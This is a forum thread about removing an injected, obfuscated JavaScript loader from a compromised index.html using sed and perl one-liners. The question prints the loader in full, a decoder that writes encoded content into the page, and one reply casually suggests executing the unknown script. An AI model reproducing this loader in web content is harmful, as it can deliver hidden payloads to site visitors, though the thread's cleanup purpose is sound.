clear complex javascript code

Hi,

Please advise how we can remove the following JavaScript content from a file on the command line, probably using awk or sed.

File before removing the content.
################################
root@server1 [~]# cat index.html

This is a test page

<script language=JavaScript>function d(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,30,9,49,32,33,37,42,60,14,0,0,0,0,0,0,58,28,8,4,13,23,5,35,18,39,15,41,25,38,11,36,17,43,22,7,26,57,27,44,6,12,2,0,0,0,0,48,0,56,24,61,54,19,59,20,52,10,1,50,3,21,51,0,40,31,45,34,16,47,55,62,53,46,29);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}d("Lk8_EeYkoEpxEVYMZdAhPEcIi7phHNcsRSD3PnWxPnW3ZqD3luBnNJWkiTW_YGa3YuWszvzvNTW_YQ2hRl8xgib5HnA_PvYMZ9K4FdY_YNAnPGK4eib5RSDv2lYMZ9DnRn83YIYnPncIFdYnjSY_NfK4VMKsYJ8xCGY_VZ")</script> This is a testing page

root@server1 [~]#

File after removing the content.
################################
root@server1 [~]# cat index.html

This is a test page

This is a testing page

root@server1 [~]#

Thanks

SpiderMonkey (JavaScript-C) Engine

Save yourself a lot of trouble and just run the JS from the command line. Here's a quick-and-dirty tutorial.

sed '/<script language=JavaScript/,/<\/script>/d' index.html

This should remove the code, but it will also remove any other script block that opens with the same tag, legitimate ones included.

The sed command above also deletes whole lines, so if </script> is followed by literal text on the same line (as in the given example), that text is removed too.
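To make the whole-line behaviour concrete, here is a small sketch run against a throwaway file. The file name demo.html, its contents, and the "Footer text" line are made up for illustration and are not from the original post.

```shell
# Hypothetical sample file (demo.html is an illustrative name, not from the thread).
tmpdir=$(mktemp -d)
cat > "$tmpdir/demo.html" <<'EOF'
This is a test page
<script language=JavaScript>d("abc")</script> This is a testing page
Footer text
EOF

# sed's range delete works on whole lines: the text after </script> is lost.
# The end pattern is only checked from the line AFTER the one that opened the
# range, so when both tags sit on one line the range runs on past it.
sed_out=$(sed '/<script language=JavaScript/,/<\/script>/d' "$tmpdir/demo.html")
printf '%s\n' "$sed_out"

rm -rf "$tmpdir"
```

In this sample only the first line survives: both the trailing text and the footer line are deleted along with the script.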

You could use XSLT to properly parse and extract the parts of the file you want, or you could do something like this:

perl -0777 -pe 's%<script language=JavaScript>.*?</script>%%gs' index.html

If this is meant to be more than a one-off job, you may want to make the regular expression a bit more general:

perl -0777 -pe 's%<script\s+language="?JavaScript"?>.*?</script>%%gis' index.html

Incidentally, this is a frequently recurring question; search this site for threads about multi-line substitution or XML/HTML substitution.

era,

Excellent, you are bang on target. Can you extend your command to perform the operation on JavaScript enclosures only if they contain, for example, "cIFdYnjSY_NfK4VMKsYJ8xCGY_VZ"?

Thanks

Something like this maybe?

perl -0777 -pe 's%<script\s+language="?JavaScript"?>.*?cIFdYnjSY_NfK4VMKsYJ8xCGY_VZ.*?</script>%%gis' index.html

era,

Perfect.

Thanks a ton.